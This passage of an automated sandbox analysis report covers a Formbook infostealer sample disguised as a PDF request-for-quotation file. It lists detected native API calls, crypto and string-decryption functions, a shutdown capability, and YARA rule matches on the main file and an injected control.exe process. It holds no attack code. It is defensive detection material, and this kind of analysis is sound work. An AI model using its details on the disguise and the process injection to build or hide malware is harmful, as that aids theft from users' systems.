Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004181B0 NtCreateFile, 2_2_004181B0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00418260 NtReadFile, 2_2_00418260
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004182E0 NtClose, 2_2_004182E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00418390 NtAllocateVirtualMemory, 2_2_00418390
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_004182DC NtClose, 2_2_004182DC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_00A098F0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_00A09860
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09840 NtDelayExecution,LdrInitializeThunk, 2_2_00A09840
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A099A0 NtCreateSection,LdrInitializeThunk, 2_2_00A099A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_00A09910
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A20 NtResumeThread,LdrInitializeThunk, 2_2_00A09A20
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00A09A00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A50 NtCreateFile,LdrInitializeThunk, 2_2_00A09A50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A095D0 NtClose,LdrInitializeThunk, 2_2_00A095D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09540 NtReadFile,LdrInitializeThunk, 2_2_00A09540
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_00A096E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_00A09660
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_00A097A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09780 NtMapViewOfSection,LdrInitializeThunk, 2_2_00A09780
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09FE0 NtCreateMutant,LdrInitializeThunk, 2_2_00A09FE0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09710 NtQueryInformationToken,LdrInitializeThunk, 2_2_00A09710
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A098A0 NtWriteVirtualMemory, 2_2_00A098A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09820 NtEnumerateKey, 2_2_00A09820
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0B040 NtSuspendThread, 2_2_00A0B040
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A099D0 NtCreateProcessEx, 2_2_00A099D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09950 NtQueueApcThread, 2_2_00A09950
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A80 NtOpenDirectoryObject, 2_2_00A09A80
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09A10 NtQuerySection, 2_2_00A09A10
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A3B0 NtGetContextThread, 2_2_00A0A3B0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09B00 NtSetValueKey, 2_2_00A09B00
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A095F0 NtQueryInformationFile, 2_2_00A095F0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09520 NtWaitForSingleObject, 2_2_00A09520
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0AD30 NtSetContextThread, 2_2_00A0AD30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09560 NtWriteFile, 2_2_00A09560
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A096D0 NtCreateKey, 2_2_00A096D0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09610 NtEnumerateValueKey, 2_2_00A09610
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09670 NtQueryInformationProcess, 2_2_00A09670
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09650 NtQueryValueKey, 2_2_00A09650
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09730 NtQueryVirtualMemory, 2_2_00A09730
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A710 NtOpenProcessToken, 2_2_00A0A710
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09760 NtOpenProcess, 2_2_00A09760
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A09770 NtSetInformationFile, 2_2_00A09770
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A0A770 NtOpenThread, 2_2_00A0A770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9540 NtReadFile,LdrInitializeThunk, 7_2_047D9540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D95D0 NtClose,LdrInitializeThunk, 7_2_047D95D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_047D9660
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9650 NtQueryValueKey,LdrInitializeThunk, 7_2_047D9650
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_047D96E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D96D0 NtCreateKey,LdrInitializeThunk, 7_2_047D96D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9710 NtQueryInformationToken,LdrInitializeThunk, 7_2_047D9710
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9FE0 NtCreateMutant,LdrInitializeThunk, 7_2_047D9FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9780 NtMapViewOfSection,LdrInitializeThunk, 7_2_047D9780
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9860 NtQuerySystemInformation,LdrInitializeThunk, 7_2_047D9860
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9840 NtDelayExecution,LdrInitializeThunk, 7_2_047D9840
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_047D9910
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D99A0 NtCreateSection,LdrInitializeThunk, 7_2_047D99A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A50 NtCreateFile,LdrInitializeThunk, 7_2_047D9A50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9560 NtWriteFile, 7_2_047D9560
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DAD30 NtSetContextThread, 7_2_047DAD30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9520 NtWaitForSingleObject, 7_2_047D9520
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D95F0 NtQueryInformationFile, 7_2_047D95F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9670 NtQueryInformationProcess, 7_2_047D9670
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9610 NtEnumerateValueKey, 7_2_047D9610
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA770 NtOpenThread, 7_2_047DA770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9770 NtSetInformationFile, 7_2_047D9770
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9760 NtOpenProcess, 7_2_047D9760
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9730 NtQueryVirtualMemory, 7_2_047D9730
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA710 NtOpenProcessToken, 7_2_047DA710
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D97A0 NtUnmapViewOfSection, 7_2_047D97A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DB040 NtSuspendThread, 7_2_047DB040
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9820 NtEnumerateKey, 7_2_047D9820
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D98F0 NtReadVirtualMemory, 7_2_047D98F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D98A0 NtWriteVirtualMemory, 7_2_047D98A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9950 NtQueueApcThread, 7_2_047D9950
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D99D0 NtCreateProcessEx, 7_2_047D99D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A20 NtResumeThread, 7_2_047D9A20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A10 NtQuerySection, 7_2_047D9A10
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A00 NtProtectVirtualMemory, 7_2_047D9A00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9A80 NtOpenDirectoryObject, 7_2_047D9A80
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047D9B00 NtSetValueKey, 7_2_047D9B00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047DA3B0 NtGetContextThread, 7_2_047DA3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007181B0 NtCreateFile, 7_2_007181B0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00718260 NtReadFile, 7_2_00718260
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007182E0 NtClose, 7_2_007182E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00718390 NtAllocateVirtualMemory, 7_2_00718390
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_007182DC NtClose, 7_2_007182DC
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040314A
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 0_2_004046A7 0_2_004046A7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00408C4B 2_2_00408C4B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00408C50 2_2_00408C50
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041BD8E 2_2_0041BD8E
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041C5A1 2_2_0041C5A1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_0041B5A1 2_2_0041B5A1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A920A8 2_2_00A920A8
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DB090 2_2_009DB090
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F20A0 2_2_009F20A0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A928EC 2_2_00A928EC
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9E824 2_2_00A9E824
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A81002 2_2_00A81002
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009CF900 2_2_009CF900
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E4120 2_2_009E4120
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A922AE 2_2_00A922AE
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A7FA2B 2_2_00A7FA2B
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009FEBB0 2_2_009FEBB0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A803DA 2_2_00A803DA
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8DBD2 2_2_00A8DBD2
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92B28 2_2_00A92B28
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009EAB40 2_2_009EAB40
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009D841F 2_2_009D841F
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8D466 2_2_00A8D466
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009F2581 2_2_009F2581
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A925DD 2_2_00A925DD
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009DD5E0 2_2_009DD5E0
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92D07 2_2_00A92D07
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009C0D20 2_2_009C0D20
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A91D55 2_2_00A91D55
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A92EF7 2_2_00A92EF7
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_009E6E30 2_2_009E6E30
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A8D616 2_2_00A8D616
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A91FF1 2_2_00A91FF1
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: 2_2_00A9DFCE 2_2_00A9DFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047A841F 7_2_047A841F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485D466 7_2_0485D466
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04790D20 7_2_04790D20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048625DD 7_2_048625DD
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862D07 7_2_04862D07
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AD5E0 7_2_047AD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861D55 7_2_04861D55
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C2581 7_2_047C2581
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B6E30 7_2_047B6E30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862EF7 7_2_04862EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485D616 7_2_0485D616
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486DFCE 7_2_0486DFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04861FF1 7_2_04861FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048620A8 7_2_048620A8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048628EC 7_2_048628EC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04851002 7_2_04851002
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0486E824 7_2_0486E824
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047C20A0 7_2_047C20A0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047AB090 7_2_047AB090
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047B4120 7_2_047B4120
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0479F900 7_2_0479F900
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048622AE 7_2_048622AE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0485DBD2 7_2_0485DBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_048503DA 7_2_048503DA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_04862B28 7_2_04862B28
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_047CEBB0 7_2_047CEBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00708C50 7_2_00708C50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00708C4B 7_2_00708C4B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0071C5A1 7_2_0071C5A1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702D90 7_2_00702D90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702D87 7_2_00702D87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00702FB0 7_2_00702FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe Code function: String function: 009CB150 appears 45 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0479B150 appears 39 times
PE file contains strange resources
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000000.00000003.647856936.000000001F036000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692313752.0000000002625000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe, 00000002.00000002.692024635.0000000000C4F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ_AP65425652_032421 isu-isu,pdf.exe
Uses 32bit PE files
Source: RFQ_AP65425652_032421 isu-isu,pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
